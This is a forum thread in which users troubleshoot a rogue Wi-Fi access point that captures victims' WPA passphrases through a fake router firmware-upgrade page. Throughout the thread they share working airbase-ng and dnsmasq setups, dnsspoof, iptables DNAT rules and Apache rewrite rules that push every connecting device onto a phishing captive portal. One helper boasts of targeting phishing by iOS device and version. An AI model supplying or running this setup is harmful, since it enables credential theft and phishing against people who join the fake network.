Fake AP Troubleshooting - Not Redirected to Fake Webpage

rogueap

(Johan C) #1

Hi,

So I have followed the guides in the free PDF provided by rootsh3ll to set up a fake AP to capture WPA-passphrases through a fake firmware-upgrade of the victims router.

I have followed the guide in the following steps.

  1. First of all killing all services and running airmon-ng check kill and putting my WiFi-interface in monitor mode.

  2. I’m using dnsmasq in conjunction with Airbase-ng so dnsmasq is initiated with the settings according to the PDF and airbase is started:

interface=at0
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h 
dhcp-option=3,10.0.0.1 
dhcp-option=6,10.0.0.1
server=8.8.8.8 
log-queries 
log-dhcp
listen-address=127.0.0.1
  1. I’m then allocating the IP-address and so forth:
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  1. I’m not forwarding traffic since i’m not planning on giving the target internet access since the router is supposed to act “offline” because of the firmware-upgrade.

  2. dnsspoofing is started

  3. AP is up and running and I connect with another computer of mine. I get connected and assigned an IP. But when i open a browser nothing happens and i’m not redirected to the apache server and the fake firmware-upgrade site.

Apache is ofc started and restarted several times and the site works fine on the server itself on 10.0.0.1

What might I be doing wrong? I have tried several guides and using both airbase and hostapd but the clients really don’t want to be redirected to the fake site.

Running Kali Linux and Alfa AWUS036ACH adapter.

My aim is for the client to connect to the fake AP and forced to the fake site running on my apache server.


(Hardeep Singh) #2

dnsspoof must be running on at0 for airbase-ng. please confirm.


(Johan C) #3

Hi,

Yes dnsspoof is running for at0 and not wlan1 which is the usual name for the interface.


(Hardeep Singh) #4

which sites are you trying to test the redirection?

my advice would be to test http based websites to see if it works than we can move ahead to the complicated stuff.
try http://example.com and see if it redirects to fake AP page.


(Johan C) #5

My goal would of course be to redirect any sort of site request to the fake update site and not a particular site.

I will try out that site and report back :wink:


(Hardeep Singh) #6

Since HSTS is implemented on majority of top 1000 sites (including rootsh3ll ), redirection is not as simple to perform.

As an alternative you can read the chapter 8 (captive portal). that can be helpful in this case


(verapex) #7

Maybe just add (for android ) inside your default apache config file: /etc/apache2/sites-enabled/000-default.conf below DocumentRoot directive.

RewriteEngine on
RedirectMatch 302 /generate_204 http://10.0.0.1/index.html

and restart your apache server

service apache2 restart

(AnonymousHaxorz) #8

I had the same issue, tried solutions from other websites till 2 am before giving up, furthest I got was to add iptables --table nat --append PREROUTING -i wlan0 -p tcp -j DNAT --to-destination 10.0.0.1:80 this is supposed to forward all traffic to 10.0.0.1:80 (my Apache server) it does indeed forward the traffic, but it sends it to 192.168.1.1 or 8.8.8.8 (not sure why it sends it to the nameserver) 192.168.1.1 is my real gateway on eth0 however on my fake AP it’s 10.0.0.1 to 192.168.1.1 obviously doesn’t do anything. Help!!


(Hardeep Singh) #9

Check your dnsmasq configuration file and edit the option named nameserver from 8.8.8.8 to 10.0.0.1

Edit: or you can simply run dnsspoof -i wlan0 along dnsmasq to redirect aLL DNS queries to your local DNS server i.e 10.0.0.1


(AnonymousHaxorz) #11

I tried changing the nameserver and dnsmasq gave me errors when trying to forward the traffic, saying It was a bad server address or something like that. Also tried doing dnsspoof on wlan0 and it gave me an error saying it couldn’t do that interface I think.


(Hardeep Singh) #12

Share the things listed below:

  1. Your setup : Tools you are using for creating Fake AP. Like dnsmasq + hostapd + dnsspoof. Like that.
  2. dnsmasq.con
  3. Error output of both dnsmasq and dnsspoof
  4. Exact iptables and hostapd/airbase-ng commands being used.

(anonymoushaxorz) #13

Not in front of the computer right now, but here is the commands I used in this exact order. Files like dnsmasq.conf and the SQL server, same as written on the article.

ifconfig wlan0 up

iwconfig wlan0 mode monitor

iwconfig wlan0 txpower 30

airmon-ng check kill

airbase-ng -e "TEST" -c 6

ifconfig at0 10.0.0.1 up

iptables --flush

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -i wlan0 -p tcp -j DNAT --to-destination 10.0.0.1:80  

dnsmasq -C dnsmasq.conf -d

service apche2 start

service mysql start 

dnsspoof -i at0

Will post errors when I’m back by the computer.


(Hardeep Singh) #14
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
iptables --append FORWARD --in-interface at0 -j ACCEPT 
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 
iptables -t nat -A POSTROUTING -j MASQUERADE

Try these iptables commands instead and let me know if that fixes the issue for you.
Also, if you find 192.168.1.1 in dnsmasq.conf then change it to 10.0.0.1 because that’s what the at0 is assigned.


(anonymoushaxorz) #15

Will try and let you know, thanks.


(AnonymousHaxorz) #16

Okay, so I got a chance to try out what you suggested, but it still does not forward to the right address.

dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1
dnsmasq: query[A] captive.apple.com from 10.0.0.120
dnsmasq: forwarded captive.apple.com to 8.8.8.8
dnsmasq: forwarded captive.apple.com to 192.168.1.1

I just get a bunch of these, I tried multiple different addresses to forward to, and all give the same result, as if the FORWARD part of the iptables simply isnt doing its job at all.


(Hardeep Singh) #17

Are you testing an Android configuration in Apache with an Apple device? That’s never going to popup the splash page.

for dnsmasq use this configuration and leave the older one.

dnsmasq:

interface=wlan0
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=127.0.0.1
log-queries
log-dhcp 
listen-address=127.0.0.1

For Apache configuration edit 000-default.conf file in /etc/apache2/sites-available/ and add this: 000-default.conf (1.7 KB)

You may edit the DocumentRoot directive as you want. This configuration will work for majority of Android. iOS and Windows devices to trigger the Captive Portal.

Edit:

:warning: NOTE: Apache uses mod_rewrite to re write URLs on the go. To enable the Rewrite Engine module in apache run sudo a2enmod rewrite


(AnonymousHaxorz) #18

Modified the two files and got this error running dnsmasq

dnsmasq: warning: interface wlan0 does not currently exist
dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h
dnsmasq: ignoring nameserver 127.0.0.1 - local interface
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 192.168.1.1#53

and this error starting the apache2 service (in journalctl -xe)

-- Unit apache2.service has begun starting up.
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: AH00526: Syntax error on line 15 of /etc/apache2/sites-enabled/000-default.conf:
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: Invalid command 'RewriteEngine', perhaps misspelled or defined by a module not included in the server co
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: Action 'start' failed.
Jan 17 22:39:55 Kali-Desktop apachectl[2869]: The Apache error log may have more information.
Jan 17 22:39:55 Kali-Desktop systemd[1]: apache2.service: Control process exited, code=exited status=1
Jan 17 22:39:55 Kali-Desktop systemd[1]: apache2.service: Failed with result 'exit-code'.
Jan 17 22:39:55 Kali-Desktop systemd[1]: Failed to start The Apache HTTP Server.
-- Subject: Unit apache2.service has failed

(Hardeep Singh) #19

For dnsmasq, edit the conf file and change wlan0 to at0 after running ifconfig at0 10.0.0.1 up

For apache, Read the third line. It says "Invalid command 'RewriteEngine'"

Running sudo a2enmod rewrite will enable apache Rewrite Engine or “mod_rewrite” module.
Restart apache to make changes. Things should work out nicely.


(AnonymousHaxorz) #20

Got it working, for the most part that is. It redirects you to the server now, however it only does that for one device, one time, and then it stops working. It send you to the fake page for the first website you visit on the browser, and I still can’t trigger the captive portal. It also doesn’t work at all on iPhones with a 100% failure rate on them.


(Hardeep Singh) #21

I disagree. It works absolutely fine and 100% of the time on my iOS devices.

Device details:

  • Device 1 - iPhone 7 / iOS 12.1.X
  • Device 2 - iPhone 6s / iOS 11 and iOS 12 Both

Here’s the recording of my iPhone 7 on iOS 12.1 with the captive portal triggered.

It works all of the time and I can even create targeted phishing campaigns on this using apache mod_rewrite. Targeting to the level of

  • Device version, and/or
  • iOS versions

I would like to see your device stack for both Android and Apple devices.